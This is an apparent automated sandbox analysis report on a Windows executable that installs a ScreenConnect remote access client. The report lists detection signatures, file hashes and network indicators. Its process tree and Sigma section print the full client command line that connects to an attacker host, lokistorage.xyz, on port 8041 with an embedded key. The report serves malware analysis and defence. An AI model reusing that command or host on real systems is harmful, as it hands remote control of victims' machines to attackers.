Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
H36NgltNe7.exe

Overview

General Information

Sample name:H36NgltNe7.exe
renamed because original name is a hash value
Original sample name:2baad4cb8a8d6af1916b38237bb766c89c2bde59d555b73484722a48463d4a6f.exe
Analysis ID:1554618
MD5:06ad0256587c76c2c405663aebee2a46
SHA1:7b7181734688075a4b226eb1db816a8af6e0f87c
SHA256:2baad4cb8a8d6af1916b38237bb766c89c2bde59d555b73484722a48463d4a6f
Tags:95-164-16-15exelokistorage-xyzuser-JAMESWT_MHT
Infos:

Detection

ScreenConnect Tool
Score:50
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:32
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Detected potential unwanted application
Enables network access during safeboot for specific services
Modifies security policies related information
Performs DNS queries to domains with low reputation
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • H36NgltNe7.exe (PID: 6560 cmdline: "C:\Users\user\Desktop\H36NgltNe7.exe" MD5: 06AD0256587C76C2C405663AEBEE2A46)
    • msiexec.exe (PID: 4868 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 5360 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 5292 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 10C72F14AAC88ABBC0F40DDD9214C022 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 2868 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7294250 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 1036 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 03D5F726DB338ACF6E810EBD73840770 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 3284 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding FE76E3AF69419F4753BCF881322892BA E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 3324 cmdline: "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=lokistorage.xyz&p=8041&s=3a500b51-1436-4bf3-8200-68822bcae42d&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=Patrycja%20Bochenek&c=PL&c=Dariusz&c=&c=&c=&c=&c=&c=" MD5: 826314610D9E854477B08666330940B5)
    • ScreenConnect.WindowsClient.exe (PID: 5040 cmdline: "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "9bc287e7-1c02-4a4b-bd79-9db7a3015930" "User" MD5: AB5FA8D90645878D587F386D0E276C02)
    • ScreenConnect.WindowsClient.exe (PID: 5796 cmdline: "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "59802056-0e86-4f92-b003-56a2c2f706f5" "System" MD5: AB5FA8D90645878D587F386D0E276C02)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
H36NgltNe7.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Config.Msi\6f527a.rbsJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        C:\Windows\Installer\MSI5509.tmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          SourceRuleDescriptionAuthorStrings
          00000000.00000002.1493878183.00000000052E0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            00000009.00000002.2730222529.0000000002C41000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              00000009.00000000.1546068019.0000000000792000.00000002.00000001.01000000.00000011.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                0000000A.00000002.1598063638.0000000002D51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  00000000.00000000.1464550811.0000000000676000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                    Click to see the 4 entries
                    SourceRuleDescriptionAuthorStrings
                    9.0.ScreenConnect.WindowsClient.exe.790000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                      0.2.H36NgltNe7.exe.52e0000.7.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                        9.2.ScreenConnect.WindowsClient.exe.2cbfa10.0.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                          10.2.ScreenConnect.WindowsClient.exe.2dcfa50.4.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                            0.2.H36NgltNe7.exe.52e0000.7.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                              Click to see the 4 entries

                              System Summary

                              barindex
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=lokistorage.xyz&p=8041&s=3a500b51-1436-4bf3-8200-68822bcae42d&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=Patrycja%20Bochenek&c=PL&c=Dariusz&c=&c=&c=&c=&c=&c=", CommandLine: "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=lokistorage.xyz&p=8041&s=3a500b51-1436-4bf3-8200-68822bcae42d&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=Patrycja%20Bochenek&c=PL&c=Dariusz&c=&c=&c=&c=&c=&c=", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe, NewProcessName: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe, OriginalFileName: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=lokistorage.xyz&p=8041&s=3a500b51-1436-4bf3-8200-68822bcae42d&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=Patrycja%20Bochenek&c=PL&c=Dariusz&c=&c=&c=&c=&c=&c=", ProcessId: 3324, ProcessName: ScreenConnect.ClientService.exe
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-11-12T18:40:36.308292+010020229301A Network Trojan was detected4.245.163.56443192.168.2.849708TCP
                              2024-11-12T18:41:04.675325+010020229301A Network Trojan was detected4.245.163.56443192.168.2.863743TCP

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: H36NgltNe7.exeReversingLabs: Detection: 21%
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 93.6% probability
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_03DB1678 CryptProtectData,8_2_03DB1678
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_03DB1671 CryptProtectData,8_2_03DB1671
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_058A0094 CryptUnprotectData,8_2_058A0094
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_058A0D40 CryptUnprotectData,8_2_058A0D40
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_058A008A CryptUnprotectData,8_2_058A008A
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeEXE: msiexec.exeJump to behavior

                              Compliance

                              barindex
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeEXE: msiexec.exeJump to behavior
                              Source: H36NgltNe7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: H36NgltNe7.exeStatic PE information: certificate valid
                              Source: H36NgltNe7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2730222529.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1597203174.0000000001262000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1598063638.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1597069748.0000000001220000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: H36NgltNe7.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1530796871.000000000088D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: H36NgltNe7.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: H36NgltNe7.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.1506976336.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: H36NgltNe7.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb/[ source: H36NgltNe7.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: H36NgltNe7.exe, 6f527a.rbs.3.dr, 6f5279.msi.3.dr, 6f527b.msi.3.dr, MSI576D.tmp.3.dr, MSI5509.tmp.3.dr, MSI5529.tmp.3.dr, setup.msi.0.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.1506976336.0000000004CAD000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2745938752.0000000002727000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1604851765.0000000012D60000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1546068019.0000000000792000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: H36NgltNe7.exe, 6f5279.msi.3.dr, 6f527b.msi.3.dr, MSI4C3F.tmp.2.dr, setup.msi.0.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1596802211.00000000011E2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdbU! source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2730222529.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1597203174.0000000001262000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1598063638.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1597069748.0000000001220000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbI source: H36NgltNe7.exe
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2745938752.0000000002727000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1604851765.0000000012D60000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.2745938752.0000000002727000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1604851765.0000000012D60000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: H36NgltNe7.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: H36NgltNe7.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                              Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior

                              Networking

                              barindex
                              Source: C:\Windows\System32\msiexec.exeRegistry value created: NULL ServiceJump to behavior
                              Source: DNS query: lokistorage.xyz
                              Source: global trafficTCP traffic: 192.168.2.8:49707 -> 95.164.16.15:8041
                              Source: Joe Sandbox ViewASN Name: NASSIST-ASGI NASSIST-ASGI
                              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:63743
                              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49708
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficDNS traffic detected: DNS query: lokistorage.xyz
                              Source: H36NgltNe7.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1604851765.0000000012D60000.00000004.00000800.00020000.00000000.sdmp, H36NgltNe7.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                              Source: H36NgltNe7.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                              Source: H36NgltNe7.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                              Source: H36NgltNe7.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                              Source: H36NgltNe7.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                              Source: H36NgltNe7.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                              Source: ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1604851765.0000000012D60000.00000004.00000800.00020000.00000000.sdmp, H36NgltNe7.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                              Source: H36NgltNe7.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0
                              Source: H36NgltNe7.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0A
                              Source: H36NgltNe7.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0C
                              Source: H36NgltNe7.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0X
                              Source: ScreenConnect.ClientService.exe, 00000008.00000002.2731727368.000000000198B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1598063638.00000000031DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: rundll32.exe, 00000005.00000003.1506976336.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1506976336.0000000004CAD000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.drString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                              Source: rundll32.exe, 00000005.00000003.1506976336.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1506976336.0000000004CAD000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.drString found in binary or memory: http://wixtoolset.org/news/
                              Source: rundll32.exe, 00000005.00000003.1506976336.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1506976336.0000000004CAD000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.drString found in binary or memory: http://wixtoolset.org/releases/
                              Source: H36NgltNe7.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://www.digicert.com/CPS0
